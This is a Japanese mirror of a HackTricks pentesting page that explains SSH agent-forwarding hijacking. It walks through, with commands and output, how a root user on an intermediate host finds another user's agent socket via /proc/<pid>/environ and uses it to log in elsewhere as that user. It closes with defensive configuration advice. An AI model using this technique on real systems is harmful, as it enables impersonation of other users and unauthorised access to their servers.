Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-16 01:38:20 +00:00

Translator workflow e90c803209 Translated to Japanese

2023-07-07 23:42:27 +00:00

16 KiB

Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
公式のPEASS＆HackTricksのグッズを手に入れましょう。
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。

概要

/etc/ssh_configまたは$HOME/.ssh/configの設定内に次のようなものが見つかった場合、どのようなことができるでしょうか？

ForwardAgent yes

もしマシン内でroot権限を持っている場合、おそらく/tmpディレクトリ内で見つけることができる任意のエージェントによって作成されたssh接続にアクセスすることができます。

Bobのssh-agentの1つを使用してBobになりすまします：

SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston

なぜこれが機能するのか？

変数 SSH_AUTH_SOCK を設定すると、Bob のキーにアクセスすることができます。これらのキーはBobのssh接続で使用されています。その後、彼の秘密鍵がまだそこにある場合（通常はそうである）、それを使用して任意のホストにアクセスすることができます。

秘密鍵はエージェントのメモリに平文で保存されているため、Bobであっても秘密鍵のパスワードを知らなくてもエージェントにアクセスして使用することができると思われます。

もう一つのオプションは、エージェントの所有者であるユーザーとrootがエージェントのメモリにアクセスして秘密鍵を抽出できる可能性があるということです。

詳しい説明と攻撃手法

引用元: https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/

ForwardAgentが信頼できない場合

パスワードなしでのSSHは、Unix系オペレーティングシステムでの作業を非常に簡単にします。ネットワークがチェーンされたSSHセッション（制限されたネットワークへのアクセスなど）を必要とする場合、エージェントの転送は非常に役立ちます。エージェントの転送を使用すると、私はラップトップから開発サーバーに接続し、そこからさらに別のサーバーでsvnチェックアウトを実行することができます。すべてのパスワードなしで、同時にプライベートキーをローカルワークステーションで安全に保持します。

しかし、これは危険です。クイックなウェブ検索で、中間ホストが信頼できる場合にのみ安全であると示す記事がいくつか見つかります。しかし、なぜ危険なのかについての説明はほとんど見つかりません。

それがこの記事の目的です。しかし、まずは背景を説明します。

パスワードなし認証の仕組み

通常のモードで認証する際、SSHはパスワードを使用してあなたが自分自身であることを証明します。サーバーは、このパスワードのハッシュとファイルに保存されているハッシュを比較し、ハッシュが一致することを検証して、あなたを許可します。

攻撃者がサーバーに送信されるパスワードを保護するために使用される暗号化を破ることができれば、それを盗むことができ、いつでもあなたとしてログインすることができます。攻撃者が何十万回もの試行を行うことが許される場合、最終的にはあなたのパスワードを推測することができます。

はるかに安全な認証方法は、パスワードなしでログインする公開鍵認証です。公開鍵認証には、公開鍵と秘密鍵のペアが必要です。公開鍵は、秘密鍵でのみ復号化できるメッセージを暗号化します。リモートコンピュータは、あなたに対して秘密メッセージを暗号化するために、あなたの公開鍵のコピーを使用します。あなたは、秘密鍵を使用してメッセージを復号化し、メッセージをリモートコンピュータに送信することで、あなたがあなたであることを証明します。秘密鍵は常にローカルコンピュータに安全に保管されており、攻撃から守られています。

秘密鍵は貴重なものであり、保護する必要があるため、デフォルトでは暗号化形式で保存されます。残念ながら、これは使用する前に暗号化のパスフレーズを入力する必要があることを意味します。多くの記事では、この不便さを避けるためにパスフレーズのない（暗号化されていない）秘密鍵を使用することを提案しています。これは悪い考えです。なぜなら、あなたのワークステーションにアクセスできる人（物理的なアクセス、盗難、またはハッキングによる）は、あなたの公開鍵で構成された任意のコンピュータに自由にアクセスできるからです。

OpenSSHには、ローカルワークステーションで実行されるデーモンであるssh-agentが含まれています。これは、秘密鍵の復号化されたコピーをメモリに読み込みます。したがって、パスフレーズを一度だけ入力する必要があります。その後、sshクライアントが使用できるローカルのソケットを提供します。このソケットを使用して、リモートサーバーから送信された暗号化されたメッセージを復号化するようにsshクライアントに要求します。あなたの秘密鍵は、パスワードを入力せずにsshを使用することができるままでありながら、ssh-agentプロセスのメモリに安全に保管されます。

ForwardAgentの動作原理

多くのタスクでは、sshセッションを「チェーン」する必要があります。先ほどの例を考えてみましょう。私はワークステーションから開発サーバーにssh接続します。そこで、"svn+ssh"プロトコルを使用してsvnの更新を行う必要があります。共有サーバーに秘密鍵の平文コピーを残しておくのは愚かなことなので、パスワード認証に制限されてしまいます。ただし、ワークステーションのssh設定で「ForwardAgent」を有効にした場合、sshは組み込みのトンネリング機能を使用して、開発サーバー上に別のソケットを作成し、それをローカルワークステーション上のssh-agentソケットにトンネルします。これにより、開発サーバー上のsshクライアントは、秘密鍵にアクセスすることなく、svnサーバーに対して「この秘密メッセージを復号化してください」という要求を直接ssh-agentに送信し、自身を認証します。

なぜこれが危険なのか

単純に言えば、中間サーバーでroot権限を持つ人は、あなたのssh-agentを自由に使用して他のサーバーに認証することができます。簡単なデモンストレーションで、これがどれほど簡単に行われるかを示します。ホスト名とユーザー名は、関係者を保護するために変更されています。

私のラップトップでは、ssh-agentが実行されており、sshクライアントプログラムとソケットを介して通信しています。このソケットへのパスは、SSH_AUTH_SOCK環境変数に保存されています：

mylaptop:~ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/launch-oQKpeY/Listeners

mylaptop:~ ls -l /tmp/launch-oQKpeY/Listeners
srwx------  1 alice  wheel  0 Apr  3 11:04 /tmp/launch-oQKpeY/Listeners

ssh-addプログラムを使用すると、エージェント内のキーを表示および操作することができます。

mylaptop:~ alice$ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)

私のラップトップの~/.ssh/configには「ForwardAgent yes」と書かれています。したがって、sshはローカルソケットとリモートサーバー上のローカルソケットを接続するトンネルを作成します。

mylaptop:~ alice$ ssh seattle

seattle:~ $ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-WsKcHa9990/agent.9990

たとえ私のキーが「seattle」にインストールされていなくても、sshクライアントプログラムはまだローカルマシンで実行されているエージェントにアクセスすることができます。

seattle:~ alice $ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)

そうですね...誰を攻撃しましょうか？

seattle:~ alice $ who
alice   pts/0        2012-04-06 18:24 (office.example.com)
bob     pts/1        2012-04-03 01:29 (office.example.com)
alice   pts/3        2012-04-06 18:31 (office.example.com)
alice   pts/5        2012-04-06 18:31 (office.example.com)
alice   pts/6        2012-04-06 18:33 (office.example.com)
charlie pts/23       2012-04-06 13:10 (office.example.com)
charlie pts/27       2012-04-03 12:32 (office.example.com)
bob     pts/29       2012-04-02 10:58 (office.example.com)

私はBobが好きではありません。彼のエージェント接続を見つけるために、彼のsshセッションの子プロセスを見つける必要があります。

seattle:~ alice $ sudo -s
[sudo] password for alice:

seattle:~ root # pstree -p bob
sshd(16816)───bash(16817)

sshd(25296)───bash(25297)───vim(14308)

以下は、実行中のプロセスの環境をrootが表示するためのいくつかの方法があります。Linuxでは、データは/proc/<pid>/environに格納されています。NULLで終わる文字列で保存されているため、NULLを改行に変換するためにtrを使用します。

seattle:~ root # tr '' 'n' < /proc/16817/environ | grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816

私は今、Bobのssh-agentを乗っ取るために必要なすべての情報を持っています。

seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh-add -l
2048 05:f1:12:f2:e6:ad:cb:0b:60:e3:92:fa:c3:62:19:17 /home/bob/.ssh/id_rsa (RSA)

もし特定のターゲットを持っている場合は、直接接続できるはずです。そうでない場合は、プロセスリストを監視したり、Bobの履歴ファイルをgrepしたりするだけで、たくさんの機会のターゲットが見つかるはずです。この場合、私はBobがサーバー「ボストン」という名前の上に秘密のファイルをたくさん持っていることを知っています。

seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
bob@boston:~$ whoami
bob

私は「seattle」でのルート権限を利用して「boston」のボブとしてアクセスすることに成功しました。彼をクビにするためにそれを利用できると思います。

自己保護！

ssh-agentにキーを無期限に保存させないでください。OS Xでは、Keychainを非アクティブ時や画面がロックされた時にロックするように設定してください。他のUnix系プラットフォームでは、ssh-agentに-tオプションを渡すことで、キーが秒後に削除されるようにします。

信頼できないホストに接続する際には、エージェントフォワーディングを有効にしないでください。幸いなことに、~/.ssh/configの構文を使用すると、これはかなり簡単です。

Host trustworthyhost
ForwardAgent yes

Host *
ForwardAgent no

16 KiB Raw Blame History Unescape Escape

概要